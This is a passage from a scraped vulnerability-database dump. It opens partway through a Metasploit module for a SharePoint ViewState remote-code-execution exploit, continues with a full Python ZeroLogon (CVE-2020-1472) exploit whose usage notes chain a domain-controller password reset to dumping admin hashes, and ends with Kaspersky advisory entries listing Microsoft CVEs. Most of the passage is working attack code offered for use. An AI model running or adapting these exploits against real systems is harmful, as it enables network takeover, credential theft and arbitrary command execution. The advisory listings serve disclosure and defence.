\ntrue \nend \n \ndef username \ndatastore['HttpUsername'] \nend \n \ndef password \ndatastore['HttpPassword'] \nend \n \ndef vuln_builds \n[ \n[Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013 \n[Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016 \n[Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019 \n] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# Hat tip @tsellers-r7 \n# \n# MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly \nunless (build_header = res.headers['MicrosoftSharePointTeamServices']) \nreturn CheckCode::Unknown('Target does not appear to be running SharePoint.') \nend \n \nunless (build = build_header.scan(/^([\\d.]+):/).flatten.first) \nreturn CheckCode::Detected('Target did not respond with SharePoint build.') \nend \n \nif vuln_builds.any? 
{ |build_range| Gem::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\") \nend \n \nCheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\") \nend \n \ndef exploit \nunless username && password \nfail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation') \nend \n \nif (@validation_key = datastore['VALIDATION_KEY']) \nprint_status(\"Using ViewState validation key #{@validation_key}\") \nelse \ncreate_ssi_page \nleak_web_config \nend \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef create_ssi_page \nprint_status(\"Creating page for SSI: #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'PUT', \n'uri' => ssi_path, \n'data' => ssi_page \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless [200, 201].include?(res.code) \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\") \nend \n \nfail_with(Failure::NotFound, 'Failed to create page') \nend \n \nprint_good('Successfully created page') \n@page_created = true \nend \n \ndef leak_web_config \nprint_status('Leaking web.config') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => ssi_path, \n'headers' => { \nssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->' \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\") \nend \n \nunless (web_config = res.get_xml_document.at('//configuration')) \nfail_with(Failure::NotFound, 'Failed 
to extract web.config from response') \nend \n \nprint_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\") \n \nunless (@validation_key = extract_viewstate_validation_key(web_config)) \nfail_with(Failure::NotFound, 'Failed to extract ViewState validation key') \nend \n \nprint_good(\"ViewState validation key: #{@validation_key}\") \nensure \ndelete_ssi_page if @page_created \nend \n \ndef delete_ssi_page \nprint_status(\"Deleting #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'DELETE', \n'uri' => ssi_path, \n'partial' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 204 \nprint_warning('Failed to delete page') \nreturn \nend \n \nprint_good('Successfully deleted page') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'), \n'vars_post' => { \n'__VIEWSTATE' => generate_viewstate_payload( \ncmd, \nextra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx \nalgo: 'sha256', \nkey: pack_viewstate_validation_key(@validation_key) \n) \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good('Successfully executed command') \nend \n \ndef ssi_page \n<<~XML \n<WebPartPages:DataFormWebPart runat=\"server\"> \n<ParameterBindings> \n<ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" /> \n</ParameterBindings> \n<xsl> \n<xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"> \n<xsl:param name=\"#{ssi_param}\" /> \n<xsl:template 
match=\"/\"> \n<xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" /> \n</xsl:template> \n</xsl:stylesheet> \n</xsl> \n</WebPartPages:DataFormWebPart> \nXML \nend \n \ndef ssi_path \n@ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\") \nend \n \ndef ssi_header \n@ssi_header ||= rand_text_alphanumeric(8..42) \nend \n \ndef ssi_param \n@ssi_param ||= rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159612/sharepoint_ssi_viewstate.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-11-18T23:15:12", "description": "", "cvss3": {}, "published": "2020-11-18T00:00:00", "type": "packetstorm", "title": "Zerologon Netlogon Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "PACKETSTORM:160127", "href": "https://packetstormsecurity.com/files/160127/Zerologon-Netlogon-Privilege-Escalation.html", "sourceData": "`# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege\n# Date: 2020-10-04\n# Exploit Author: West Shepherd\n# Vendor Homepage: https://www.microsoft.com\n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2\n# Tested on: Microsoft Windows Server 2016 Standard x64\n# CVE : CVE-2020-1472\n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code\n# Sources: https://www.secura.com/pathtoimg.php?id=2055\n# Requirements: python3 and impacket 0.9.21+ (tested using this version)\n#!/usr/bin/env python3\nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs\nfrom binascii import hexlify, unhexlify\nfrom subprocess import check_call\nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5 import nrpc, epm, transport\nfrom impacket import crypto, version\nfrom impacket.examples import logger
\nfrom Cryptodome.Cipher import AES\nfrom struct import pack, unpack\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\n\nclass Exploit:\n    def __init__(\n        self,\n        name='',\n        address='',\n        attempts=2000,\n        password=''\n    ):\n        name = name.rstrip('$')\n        self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel\n        self.authenticator = self.getAuthenticator(stamp=0)\n        # An all-zero 516-byte password blob sets the DC machine account password to empty.\n        self.clearNewPasswordBlob = b'\\x00' * 516\n        self.primaryName = ('\\\\\\\\%s' % name) + '\\x00'\n        self.accountName = ('%s$' % name) + '\\x00'\n        self.computerName = name + '\\x00'\n        # Zerologon: with AES-CFB8 and a zero IV, an all-zero client challenge produces an\n        # all-zero client credential for roughly 1 in 256 session keys, so zeros are accepted\n        # without knowing the machine password.\n        self.clientCredential = b'\\x00' * 8\n        self.clientChallenge = b'\\x00' * 8\n        # Negotiate flags with sign/seal disabled, so the channel is used without encryption.\n        self.negotiateFlags = 0x212fffff\n        self.address = address\n        self.max = attempts\n        self.dce = None\n        self.sessionKey = None\n        self.clientStoredCredential = None\n        self.password = password\n\n    def encodePassword(self, password):\n        if isinstance(password, str):\n            password = password.encode('utf-8')\n        # NL_TRUST_PASSWORD layout: right-aligned password in a 512-byte buffer, then its length.\n        return b'\\x00' * (512 - len(password)) + password + pack('<L', len(password))\n\n    def getAuthenticator(self, creds=b'\\x00' * 8, stamp=10):\n        authenticator = nrpc.NETLOGON_AUTHENTICATOR()\n        authenticator['Credential'] = creds\n        authenticator['Timestamp'] = stamp\n        return authenticator\n\n    def serverReqChallenge(self):\n        try:\n            binding = epm.hept_map(\n                self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'\n            )\n            self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()\n            self.dce.connect()\n            self.dce.bind(nrpc.MSRPC_UUID_NRPC)\n            return nrpc.hNetrServerReqChallenge(\n                self.dce,\n                self.primaryName,\n                self.computerName,\n                self.clientChallenge\n            )\n        except BaseException as ex:\n            self.logError(ex)\n\n    def serverAuthenticate(self):\n        try:\n            auth = nrpc.hNetrServerAuthenticate3(\n                self.dce,\n                self.primaryName,\n                self.accountName,\n                self.secureChannelType,\n                self.computerName,\n                self.clientCredential,\n                self.negotiateFlags\n            )\n            assert auth['ErrorCode'] == 0\n            self.logInfo('successfully authenticated')
\n            return True\n        except nrpc.DCERPCSessionError as ex:\n            self.dce = None\n            # STATUS_ACCESS_DENIED: the zero credential did not match this session key, retry.\n            if ex.get_error_code() == 0xc0000022:\n                return None\n            else:\n                self.logFail(ex.get_error_code())\n        except BaseException as ex:\n            self.dce = None\n            self.logFail(ex)\n        self.dce = None\n\n    def serverPasswordSet(self):\n        try:\n            return nrpc.hNetrServerPasswordSet2(\n                self.dce,\n                self.primaryName,\n                self.accountName,\n                self.secureChannelType,\n                self.computerName,\n                self.authenticator,\n                self.clearNewPasswordBlob\n            )\n        except BaseException as ex:\n            self.logError(ex)\n\n    def authenticate(self):\n        self.logInfo(\n            'checking target, attempting to authenticate %d max attempts' % self.max\n        )\n        # Every attempt gets a fresh server challenge and therefore a fresh session key;\n        # a vulnerable DC accepts the all-zero credential after about 256 attempts on average.\n        for attempt in range(0, self.max):\n            self.logInfo('attempt %d' % attempt)\n            self.serverReqChallenge()\n            self.serverAuthenticate()\n            if self.dce is not None:\n                break\n        if self.dce:\n            return True\n        else:\n            self.logError('failed to authenticate')\n\n    def exploit(self):\n        self.logInfo('attempting password reset')\n        reset = self.serverPasswordSet()\n        if reset['ErrorCode'] == 0:\n            self.logInfo('successfully reset password')\n        else:\n            self.logError('failed to reset password')\n        return self\n\n    def ComputeNetlogonCredentialAES(self, challenge):\n        return nrpc.ComputeNetlogonCredentialAES(\n            challenge,\n            self.sessionKey\n        )\n\n    def logInfo(self, message):\n        sys.stdout.write(\"[+] %s\\n\" % str(message))\n        return self\n\n    def logError(self, message):\n        sys.stderr.write(\"[-] error %s\\n\" % str(message))\n\n    def logFail(self, message):\n        sys.stderr.write(\"[!] failure %s\\n\" % str(message))\n        sys.exit(2)\n\n    def restore(self):\n        self.logInfo('attempting to restore password')\n        self.clientChallenge = b'12345678'\n        try:\n            self.primaryName = NULL\n            challenge = self.serverReqChallenge()\n            # The machine password is now empty, so a real session key is derived from an empty secret.\n            self.sessionKey = nrpc.ComputeSessionKeyAES(\n                '', self.clientChallenge, challenge['ServerChallenge']\n            )\n            self.clientCredential = self.ComputeNetlogonCredentialAES(\n                self.clientChallenge\n            )\n            try:\n                self.serverAuthenticate()\n            except Exception as e:\n                if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:\n                    raise\n            self.logInfo('restoring password')\n            self.clientStoredCredential = pack('<Q', unpack('<Q', self.clientCredential)[0] + 10)\n            self.authenticator = self.getAuthenticator(\n                creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)\n            )\n            # Encrypt the original machine password with the session key and set it back.\n            self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(\n                self.encodePassword(self.password)\n            )\n            reset = self.serverPasswordSet()\n            if reset['ErrorCode'] == 0:\n                self.logInfo('successfully restored password')\n            else:\n                self.logError('failed to restore password')\n        except Exception as ex:\n            self.logError(ex)\n        return self\n\n\nif __name__ == '__main__':\n    info = \"\"\"\nNOTE - Exploitation will break the DC until restored, recommended guidelines:\n\n1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:\ncve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>\n\n2. Exploit the DC - this will break the DC until restored:\ncve-2020-1472.py -do exploit -target <NETBIOS NAME> -ip <IP>\n\n3. Dump the DC - for the DA hashes, this will not contain the\nmachine hex-pass:\nsecretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP>\n\n4. Dump the DC again - use the DA hash to get the machines hex-pass:\nsecretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>\n\n5. Restore target - this fixes the DC:\ncve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> -hex <HEXPASS>\n\"\"\"\n    parser = argparse.ArgumentParser(\n        description='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege',\n        add_help=True\n    )\n    try:\n        parser.add_argument('-do', default='check', action='store',\n                            help='What to do (default check): [check|restore|exploit]')\n        parser.add_argument('-target', action='store',\n                            help='NETBIOS name of target DC (not the FQDN)')\n        parser.add_argument('-ip', action='store',\n                            help='IP address of target DC')\n        parser.add_argument('-password', default='', action='store',\n                            help='The plaintext password to use to reset the DC')\n        parser.add_argument('-hex', default='', action='store',\n                            help='The hex password to use to restore the DC (recommended)')\n        parser.add_argument('-max', default=2000, action='store',\n                            help='Max attempts to authenticate with the DC (usually ~300 or less)')\n\n        if len(sys.argv) < 3:\n            parser.print_help()\n            print(info)\n            sys.exit(1)\n        options = parser.parse_args()\n\n        if options.do.lower() == 'check':\n            Exploit(\n                name=options.target,\n                address=options.ip,\n                attempts=int(options.max)\n            ).authenticate()\n        elif options.do.lower() == 'exploit':\n            exp = Exploit(\n                name=options.target,\n                address=options.ip,\n                attempts=int(options.max)\n            )\n            if exp.authenticate():\n                exp.exploit()\n        elif options.do.lower() == 'restore':\n            if options.hex != '' and options.password == '':\n                options.password = unhexlify(options.hex)\n            if options.password != '':\n                exp = Exploit(\n                    name=options.target,\n                    address=options.ip,\n                    password=options.password\n                ).restore()\n            else:\n                parser.print_help()\n\n    except Exception as error:\n        sys.stderr.write('[-] error in main %s\\n' % str(error))\n\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160127/zerologon-poc.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:00:17", 
"description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nACE vulnerabilities were found in Microsoft Apps. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Affected products*:\nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \n3D Viewer\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-17003](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-17003>) \n[CVE-2020-16918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Yammer Desktop App](<https://threats.kaspersky.com/en/product/Yammer-Desktop-App/>)\n\n### *CVE-IDS*:\n[CVE-2020-17003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17003>)9.3Critical \n[CVE-2020-16918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16918>)9.3Critical", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T00:00:00", "type": "kaspersky", "title": "KLA11974 ACE vulnerabilities in Microsoft Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, 
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16918", "CVE-2020-17003"], "modified": "2020-10-19T00:00:00", "id": "KLA11974", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11974/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T18:04:13", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, gain privileges, spoof user interface, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2016 \nWindows 8.1 for x64-based systems \nWindows Server 
2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16923](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16923>) \n[CVE-2020-16889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16889>) \n[CVE-2020-16887](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16887>) \n[CVE-2020-16902](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16902>) \n[CVE-2020-16885](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16885>) \n[CVE-2020-16898](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16898>) 
\n[CVE-2020-16968](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16968>) \n[CVE-2020-16939](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16939>) \n[CVE-2020-16980](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16980>) \n[CVE-2020-16972](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16972>) \n[CVE-2020-16967](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16967>) \n[CVE-2020-16876](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16876>) \n[CVE-2020-16919](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16919>) \n[CVE-2020-16940](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16940>) \n[CVE-2020-16908](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16908>) \n[CVE-2020-16909](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16909>) \n[CVE-2020-16920](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16920>) \n[CVE-2020-16907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16907>) \n[CVE-2020-16922](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16922>) \n[CVE-2020-16905](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16905>) \n[CVE-2020-16924](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16924>) \n[CVE-2020-1243](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1243>) \n[CVE-2020-16900](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16900>) \n[CVE-2020-16927](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16927>) \n[CVE-2020-0764](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0764>) 
\n[CVE-2020-16890](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16890>) \n[CVE-2020-16891](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16891>) \n[CVE-2020-16892](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16892>) \n[CVE-2020-16894](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16894>) \n[CVE-2020-16901](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16901>) \n[CVE-2020-16896](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16896>) \n[CVE-2020-16897](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16897>) \n[CVE-2020-16973](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16973>) \n[CVE-2020-16899](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16899>) \n[CVE-2020-1047](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1047>) \n[CVE-2020-16976](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16976>) \n[CVE-2020-16975](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16975>) \n[CVE-2020-16974](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16974>) \n[CVE-2020-16936](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16936>) \n[CVE-2020-16935](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16935>) \n[CVE-2020-1167](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1167>) \n[CVE-2020-16877](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16877>) \n[CVE-2020-16912](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16912>) \n[CVE-2020-1080](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1080>) 
\n[CVE-2020-16914](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16914>) \n[CVE-2020-16916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16916>) \n[CVE-2020-16911](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16911>) \n[CVE-2020-16910](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16910>) \n[CVE-2020-16913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16913>) \n[CVE-2020-16938](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16938>) \n[CVE-2020-16915](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16915>) \n[CVE-2020-16921](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16921>) \n[CVE-2020-16895](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16895>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-16923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16923>)6.8High \n[CVE-2020-16889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16889>)2.1Warning \n[CVE-2020-16887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16887>)4.6Warning \n[CVE-2020-16902](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16902>)7.2High \n[CVE-2020-16885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16885>)4.6Warning \n[CVE-2020-16898](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16898>)5.8High \n[CVE-2020-16968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16968>)9.3Critical \n[CVE-2020-16939](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16939>)4.6Warning \n[CVE-2020-16980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16980>)4.6Warning 
| CVE | Score | Severity |
|---|---|---|
| [CVE-2020-16972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16972>) | 4.6 | Warning |
| [CVE-2020-16967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16967>) | 9.3 | Critical |
| [CVE-2020-16876](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16876>) | 4.6 | Warning |
| [CVE-2020-16919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16919>) | 2.1 | Warning |
| [CVE-2020-16940](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16940>) | 4.9 | Warning |
| [CVE-2020-16908](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16908>) | 7.2 | High |
| [CVE-2020-16909](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16909>) | 4.6 | Warning |
| [CVE-2020-16920](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16920>) | 4.6 | Warning |
| [CVE-2020-16907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16907>) | 7.2 | High |
| [CVE-2020-16922](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16922>) | 2.1 | Warning |
| [CVE-2020-16905](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16905>) | 4.6 | Warning |
| [CVE-2020-16924](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16924>) | 9.3 | Critical |
| [CVE-2020-1243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1243>) | 4.6 | Warning |
| [CVE-2020-16900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16900>) | 4.6 | Warning |
| [CVE-2020-16927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16927>) | 7.8 | Critical |
| [CVE-2020-0764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0764>) | 4.6 | Warning |
| [CVE-2020-16890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16890>) | 7.2 | High |
| [CVE-2020-16891](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16891>) | 7.2 | High |
| [CVE-2020-16892](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16892>) | 4.6 | Warning |
| [CVE-2020-16894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16894>) | 6.8 | High |
